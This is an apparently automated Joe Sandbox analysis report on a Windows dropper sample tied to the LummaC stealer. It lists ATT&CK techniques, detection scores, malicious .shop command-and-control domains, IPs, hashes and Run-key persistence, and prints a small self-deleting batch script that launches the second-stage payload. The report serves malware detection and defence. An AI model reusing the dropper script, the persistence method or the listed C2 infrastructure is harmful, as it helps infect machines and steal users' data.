Gather Victim Identity Information	1 Scripting	Valid Accounts	331 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	412 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	223 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	351 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	351 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
57lklPjdPc.exe	100%	Avira	TR/Dropper.MSIL.Gen8
57lklPjdPc.exe	100%	Joe Sandbox ML
57lklPjdPc.exe	62%	Virustotal		Browse
57lklPjdPc.exe	58%	ReversingLabs	ByteCode-MSIL.Dropper.Marsilia

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Roaming\57lklPjdPc.exe	100%	Avira	TR/Dropper.MSIL.Gen8
C:\Users\user\AppData\Roaming\57lklPjdPc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\57lklPjdPc.exe	58%	ReversingLabs	ByteCode-MSIL.Dropper.Marsilia
C:\Users\user\AppData\Roaming\57lklPjdPc.exe	62%	Virustotal		Browse
C:\Users\user\AppData\Roaming\l6E.exe	29%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
strompreis.ru	3%	Virustotal		Browse
eemmbryequo.shop	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://stackoverflow.com/q/14436606/23354	0%	Avira URL Cloud	safe
http://www.microsoft.5	0%	Avira URL Cloud	safe
tryyudjasudqo.shop	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png4	0%	Avira URL Cloud	safe
http://nuget.org/NuGet.exe	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
tryyudjasudqo.shop	0%	Virustotal		Browse
reggwardssdqw.shop	100%	Avira URL Cloud	malware
http://nuget.org/NuGet.exe	0%	Virustotal		Browse
https://stackoverflow.com/q/14436606/23354	0%	Virustotal		Browse
https://contoso.com/License	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
reggwardssdqw.shop	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Avira URL Cloud	safe
licenseodqwmqn.shop	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png4	10%	Virustotal		Browse
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://crl.microsw	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	8%	Virustotal		Browse
https://aka.ms/pscore6lBmq	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Virustotal		Browse
https://eemmbryequo.shop/le4K#	100%	Avira URL Cloud	malware
licenseodqwmqn.shop	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html4	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html4	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Avira URL Cloud	safe
https://eemmbryequo.shop/U	100%	Avira URL Cloud	malware
https://github.com/Pester/Pester	1%	Virustotal		Browse
relaxatinownio.shop	100%	Avira URL Cloud	malware
https://github.com/Pester/Pester4	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Virustotal		Browse
relaxatinownio.shop	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Virustotal		Browse
keennylrwmqlw.shop	100%	Avira URL Cloud	malware
https://eemmbryequo.shop/api7	100%	Avira URL Cloud	malware
https://stackoverflow.com/q/2152978/23354rCannot	0%	Avira URL Cloud	safe
https://eemmbryequo.shop/api3	100%	Avira URL Cloud	malware
https://stackoverflow.com/q/11564914/23354;	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester4	0%	Virustotal		Browse
https://stackoverflow.com/q/11564914/23354;	0%	Virustotal		Browse
https://contoso.com/	0%	Avira URL Cloud	safe
tesecuuweqo.shop	100%	Avira URL Cloud	malware
https://stackoverflow.com/q/2152978/23354rCannot	0%	Virustotal		Browse
keennylrwmqlw.shop	0%	Virustotal		Browse
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
tendencctywop.shop	100%	Avira URL Cloud	malware
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
tesecuuweqo.shop	9%	Virustotal		Browse
https://eemmbryequo.shop/	100%	Avira URL Cloud	malware
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://eemmbryequo.shop/api	100%	Avira URL Cloud	malware
https://nuget.org/nuget.exe	0%	Virustotal		Browse
https://eemmbryequo.shop/	12%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
eemmbryequo.shop	100%	Avira URL Cloud	malware
https://eemmbryequo.shop/api	17%	Virustotal		Browse
https://contoso.com/	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Virustotal		Browse
eemmbryequo.shop	0%	Virustotal		Browse
tendencctywop.shop	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
strompreis.ru	45.11.229.96	true	true	3%, Virustotal, Browse	unknown
eemmbryequo.shop	172.67.142.26	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tryyudjasudqo.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
reggwardssdqw.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
licenseodqwmqn.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
relaxatinownio.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
keennylrwmqlw.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
tesecuuweqo.shop	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
tendencctywop.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://eemmbryequo.shop/api	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
eemmbryequo.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pesterbdd.com/images/Pester.png4	powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoft.5	powershell.exe, 00000002.00000002.49315828054.0000000007108000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315232618.0000000007030000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315828054.00000000070E1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315232618.0000000007030000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.microsw	powershell.exe, 00000002.00000002.49315828054.0000000007108000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBmq	powershell.exe, 00000002.00000002.49309138147.0000000004811000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eemmbryequo.shop/le4K#	RegAsm.exe, 0000000D.00000002.50080745880.000000000142F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html4	powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49315232618.0000000007030000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://eemmbryequo.shop/U	RegAsm.exe, 0000000D.00000002.50080745880.000000000142F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester4	powershell.exe, 00000002.00000002.49309138147.0000000004968000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://eemmbryequo.shop/api7	RegAsm.exe, 0000000D.00000002.50080745880.000000000137A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/2152978/23354rCannot	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000004.00000002.49603643595.00000000031C2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://eemmbryequo.shop/api3	RegAsm.exe, 0000000D.00000002.50081821203.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.49313777197.000000000587F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49308050475.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eemmbryequo.shop/	RegAsm.exe, 0000000D.00000002.50081821203.0000000001449000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.50080745880.000000000142F000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ocsp.quovadisoffshore.com0	57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49308050475.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	57lklPjdPc.exe, 00000000.00000002.50531977968.000000000373A000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.49309138147.0000000004811000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.142.26	eemmbryequo.shop	United States		13335	CLOUDFLARENETUS	true
45.11.229.96	strompreis.ru	Germany		397525	ALPHAONE-ASUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1513633
Start date and time:	2024-09-19 02:35:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	57lklPjdPc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/9@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 87% Number of executed functions: 385 Number of non-executed functions: 48
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Execution Graph export aborted for target 57lklPjdPc.exe, PID 4264 because it is empty
Execution Graph export aborted for target 57lklPjdPc.exe, PID 5276 because it is empty
Execution Graph export aborted for target 57lklPjdPc.exe, PID 8048 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:37:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 57lklPjdPc C:\Users\user\AppData\Roaming\57lklPjdPc.exe
02:37:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 57lklPjdPc C:\Users\user\AppData\Roaming\57lklPjdPc.exe
20:37:45	API Interceptor	3x Sleep call for process: powershell.exe modified
20:37:51	API Interceptor	4132456x Sleep call for process: 57lklPjdPc.exe modified
20:39:02	API Interceptor	2x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.142.26	l6E.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
45.11.229.96	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse
	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
eemmbryequo.shop	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	104.21.39.11
	l6E.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	log-analyzer.exe	Get hash	malicious	LummaC, MicroClip	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.39.11
strompreis.ru	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	45.11.229.96
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	104.21.39.11
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	ESD99W89W99-PO9W2788Q-SHK092782.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	104.21.13.231
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.161.117
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://meatamasklogine.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.147.209
ALPHAONE-ASUS	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	45.11.229.96
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	Aqua.mpsl-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.arm7-20240804-2157.elf	Get hash	malicious	Mirai	Browse	45.13.227.24
	Aqua.mips-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.x86_64-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	38.79.86.219
	ca1b58Nxwf.elf	Get hash	malicious	Unknown	Browse	45.13.227.201

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	172.67.142.26
	http://gsx2-crm-apple-portal.com/go.php	Get hash	malicious	Unknown	Browse	172.67.142.26
	x64_stealth.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	172.67.142.26
	software.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	DLPAgent.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	172.67.142.26
	l6E.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.142.26
	log-analyzer.exe	Get hash	malicious	LummaC, MicroClip	Browse	172.67.142.26

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\l6E.exe	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse
C:\Users\user\AppData\Roaming\57lklPjdPc.exe	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\57lklPjdPc.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\57lklPjdPc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	642
Entropy (8bit):	5.347865511241357
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPtXR5fOKbbDLI4MWuPJKMsDbKhaWzAbDLI4MN3It9nRhav:ML9E4K1BIKDE4KhKMaKhBsXE4kI3nRe
MD5:	636031DF9C95994461620435F86995AA
SHA1:	5C600400BB6938016AA1594E7FFB79D03CDB89C7
SHA-256:	A87C25EB2F6BC5F3A70F6FF34DE63211ED3BA8FF8A1ADF6099D06CE304A216AB
SHA-512:	927194BAA7610C2EE931290CC75E151BD96AA131AF4BE7E2058461060A89934835A063668EFFBD2A509AA122515E5A2248D0089302EBFE17953CD07AE32477B6
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\0accf2e4f7016da22c582e373fae949e\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\l6E.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\l6E.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat

Download File

Process:	C:\Users\user\Desktop\57lklPjdPc.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	168
Entropy (8bit):	5.184128985848027
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLqFvEROr+jn9m1ONtkEaKC5i0ZBktKcKZG1ONtkE2J5xAIw6ERHn:hCRLqFcROr+DE1CNaZ5i0ZKOZG1CN23O
MD5:	F3095D94346BC26BCA1DB44D07582D42
SHA1:	20D50FBF83208FFDFD4B6F0F47A0C0CDB9D2CD7B
SHA-256:	838C7B5FB963736B79F070E60DBCC1AB3E6533D7E5E20AE473C076C895559BB7
SHA-512:	F46A6E21C5CE7FCA21623D3EF9825016C3B74604D15252F11DD22CEA4F68A27E418D067E6C97FD7076AE250127A857BFE591E02BE438D1993DD0E5EE0B48B550
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 5 localhost > nul..start "" "C:\Users\user\AppData\Roaming\l6E.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat"

